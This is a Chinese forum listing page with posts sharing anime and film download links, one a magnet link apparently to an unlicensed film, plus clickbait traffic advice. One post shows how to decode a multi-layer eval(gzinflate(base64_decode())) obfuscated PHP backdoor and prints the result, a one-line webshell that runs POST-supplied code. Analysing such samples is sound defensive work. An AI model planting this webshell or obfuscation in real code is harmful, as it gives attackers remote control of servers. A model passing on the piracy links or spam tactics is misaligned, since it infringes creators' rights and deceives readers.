一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
今日:0    总帖:30
yixiaotao
3251
出包女王1~4部 有图   动漫
超级纯情的男高中生“结城梨斗”一直暗恋着“西连寺春菜”,虽然春菜心里也早已对梨斗有意思,但双方却完全不知道对方的心意。在梨斗终于下定决心向春菜表白时,一连串的Trouble(出包)让他告白成功的对象变成突然从天而降的外星美少女“菈菈”。和菈菈相遇之后,梨斗连锁性的被卷入各种麻烦。故事就围绕在梨斗、菈菈和春菜的三角关系,以及和“金色暗影”及“古手川唯”等少女的相遇与交流展开。梨斗状况不断又带点情色的日常生活就这样呈现在读者面前。链接:出包女王系列
8 0 2424天前
yixiaotao
2797
《三生三世十里桃花》是由阿里影业、儒意影业联合出品,由赵小丁、安东尼·拉默里纳拉联合执导,刘亦菲、杨洋领衔主演,罗晋、严屹宽、李纯、顾璇、彭子苏等联袂出演的古装玄幻爱情仙侠电影,于2017年8月3日在中国大陆上映。该片以网络长篇小说《三生三世十里桃花》为基础改编,讲述了青丘帝姬白浅和九重天太子夜华的三生情缘链接:百度云 密码:p637
10 0 2424天前
yixiaotao
2994
《变形金刚》系列电影是由美国派拉蒙影业公司出品科幻动作电影,由迈克尔·贝执导,变形金刚于2007年7月3日在美国上映、变形金刚2于2009年6月24日在美国上映、变形金刚3于2011年6月29日在美国上映、变形金刚4:绝迹重生于2014年6月27日在美国上映、变形金刚5:最后的骑士于2017年6月23日在美国上映。链接:百度云 密码:m9dz
8 0 2424天前
yixiaotao
3100
蜘蛛侠:英雄归来动作/科幻/冒险2017-09-08 上映 133分钟演职人员:乔·沃茨(导演) / 汤姆·赫兰德/小罗伯特·唐尼/迈克尔·基顿/玛丽莎·托梅/赞达亚/雅各·巴塔伦/罗根·马歇尔-格林/马丁·斯塔尔/劳拉·海瑞尔/托尼·雷沃罗利剧情经历了复联内战后,彼得·帕克(汤姆·赫兰德 饰)回到普通高中生活,并受到钢铁侠托尼·斯塔克(小罗伯特·唐尼 饰)的指导与暗中关注。一心想要证明自己能力的小蜘蛛,在一场银行劫案后遭遇了拥有外星终极武器的反派秃鹰(迈克尔·基顿 饰),却因一时心急而使万千生命陷入危机。此时,钢铁侠却意外收回了赠予蜘蛛侠的无敌战衣,这对于遭遇重创的蜘蛛侠无异于雪上加霜。他能否证明自己的能力,成功保卫家园成为悬念,而他“获得复联入场券”的梦想,也看似遥遥无期……链接:百度云
7 0 2424天前
wolfman
2329
免费分享,网盘引流轻松赚钱!回复可见隐藏内容
8 1 2425天前
wolfman
2904
app发布文章测试
6 0 2432天前
wolfman
3142
今天刷微信朋友圈,看到朋友圈有人发这个,刚刚1分钟刷新的,打开就有400多人浏览了。突然觉得太牛逼了。他的公众号名字是 ,某某笑话,因为被这标题吸引本身就是一个笑话,感觉很有趣,自然就会关注他了。进去看了看历史信息。全部是100000+阅读。看来真是一个引流高手呀。看来色流依然是效率最快的。。。如果有需要引流的  不妨试试这方法  标题党引流   朋友圈  微信群太多了    这个是我见过效果最好的 
12 0 2453天前
yixiaotao
3171
名字:战狼2大小:4.1GB片长: 123分钟类型: 动作,战争详情:冷锋将卷入一场非洲国家的叛乱,本可以安全撤离的他,因无法忘记军人的使命,不丢下身陷囹圄的同胞和难民们,只身犯险冲回沦陷区,带领所有被困民众向邻国大逃亡。由于百度云的下载会失效,所以发的是磁力:magnet:?xt=urn:btih:F00EC5403D70ED23B18677A110E7B55C1B10E452建议:迅雷下载。
19 0 2456天前
wolfman
5662
打开这些网页之后,随便在键盘上打字就会在屏幕上出现各种代码了,记得按下 F11 (Windows) 或 ⌘-Shift-F(Mac) 将浏览器全屏显示,这样装 X 效果更好!另外,按下数字小键盘的 / * - + 2 8 0 等按键可以弹出不同的特效,譬如出现登录成功、登录失败、雷达扫描、导弹发射等等效果,按下 ESC 可以移除它们。注意,推荐使用 Chrome、FireFox、IE11 等比较先进的浏览器进行访问,如果还在使用 IE6 之类的老旧浏览器可能效果会不正常。http://hackcode.ishoulu.com/scp/http://hackcode.ishoulu.com/combine/http://hackcode.ishoulu.com/blackmesa/http://hackcode.ishoulu.com/blackmesa/http://hackcode.ishoulu.com/matrix/http://hackcode.ishoulu.com/swan/http://hackcode.ishoulu.com/64/
25 0 2474天前
wolfman
3163
今天群里一位朋友发了一个php的马子,经过了gzinflate和base64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码和解码代码方法,就是通常我们在程序中见的eval(gzinflate(base64_decode('加密代码'))); 形式的加密方法。首先,针对一层加密的,我们可以直接把eval改为echo即可解密,这里我就不多解释了,今天要解密的代码如下:经过加密的代码<?php echo(gzinflate(base64_decode('DdS3EqNWAEDRfn/Eu0NBTmOPd8hCpEcWNB7CAyRA5Pj13u42p72///3n99iMP37APet+1vf7W3XZCn/m2QIZ6r8SFkMJf/4ll96jnWxdUGSvipB2wnTz8xBSECiRrp8C1DlCud/NqVu1lcEKLGq1V+jN3hxKkTvHZ6uSVWv0zUV0hZ1f9a9xJPwBpYbrQc0Xw5YJAUra6iKodOSy5tPe7Gt7fRLuqRnu0IO7HmRrVD1fxFeK2f2O1fv5wqik6ci0XuSjF4Swsih9w1QiGhdHod7s1r9EhnivBnLsmn4xa4lbDA6WrAPtdbdEHOZswZhkFO3s0/HloCA9DY8P4+bJkXLIdchUxFHPTxKZWt+WnWmGLXhiQHN3qm0Q6VnoO3vY/ckHsWOIGlV8XMV+UaZEcKBPsZgj+S7kKISh2ZQiNnVK4zlHRIt6B3jDl1Q4+e1dy5ZqmXb73JPXtWn+17i/hvBQFlEdrFopoTeovgwy5WxlIZVZNEnYBYkG6g9OQrBgxMC7yVs6jwjMpoeCIIio/dFLm3cHTaA141F+CvRT0swD9PPbqdBl3Hyo7kclQMFmTIumUi3tyVEMWI6S7DE3Ycn148vqQGTmZJx9OU5gjQg5gjN2jZ1QDgALD40TJJQQGj9S4JXm6GlyYW3wDViCyCEpeB4wiJWX8za3/WYMePG2i03eKDCHrtUlY1qsOEje1ZNI0Vys8DHUy5iAW/yVvs+mESrbTA9BLQtsI52NNSsmEQ5J8FHadb0gFXiQsWTHoOfByWnW9zaJz/uTND4Mts76xBqIVB48F1l7rvf50Dg+XBai/DzNS40ITBXbsJxjsOjqWKN9/piDp6nOSUu+0qwz8KM4ibR1MLL6TpK4PKjNd+0IWZE/8R3myU3TJ+X3/ZiO1ewlH/p8PBoGh6C+71RfrG7Ir7kSri3QDmWGZ+v3rIjfsIqVqCfPGwZPxV6+CoRE60eY1DhE57EGl77cJtPd7aKbY44XEjjTsqZGpaYLy4VEWORuuCAcYz0TTtc8Ui7UpgaqpU7NSSi4r7wnLLHlmXA8tbSA+9CZvhz77ZWq7A37rvoMFytqNlzcb6NQnEu/wzMusfJBn68TzeTtcpGEdujKeOnrFngtW8RO7VTMIm5evd80RnEQ0+O78O+JYEMd5a9stxWXWxWJaKV6qiTPYXxFV/rdUhFGQmb+jbmHML4fHF/tLILuYKYRNEHr6q9fv379/eP3nxn9Dw=='))); ?>我尝试过把eval改为echo结果发现还是类似的东西,经过查找终于发现了解决办法。解密方法1<?php /** * Created BY 独自等待 */ //已经加密的文件内容 $a = "eval(gzinflate(base64_decode('这里面放BASE64代码')));"; function decodephp($a) { $max_level = 300; //最大层数 for ($i = 0; $i < $max_level; $i++) { ob_start(); eval(str_replace('eval', 'echo', $a)); $a = ob_get_clean(); if (strpos($a, 'eval(gzinflate(base64_decode') === false) { return $a; } } } echo decodephp($a); ?> 解密方法2<?php /** * Created BY 独自等待 */ $a = file_get_contents("加密.php"); //含有eval语句的文本文件 //将有eval(gzinflate(base64_decode的加密文件只留eval(gzinflate(base64_decode('...');"语句 //其他诸如"<?"等信息都去掉并保存文件为"加密.php" while (strstr($a, "eval")) { ob_start(); eval(str_replace("eval", "echo", $a)); $a = ob_get_contents(); } echo $a; ?> 最终经过密码得到源代码如下:<?php eval($_POST[coo0l]);?>不知道是哪位大牛的一句话,经过了这么多层加密,太强大了。在线解密:http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php
7 0 2476天前
快速发帖 高级模式
加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:3.141.0.61,2024-04-30 03:12:14,Processed in 0.20354 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.0.0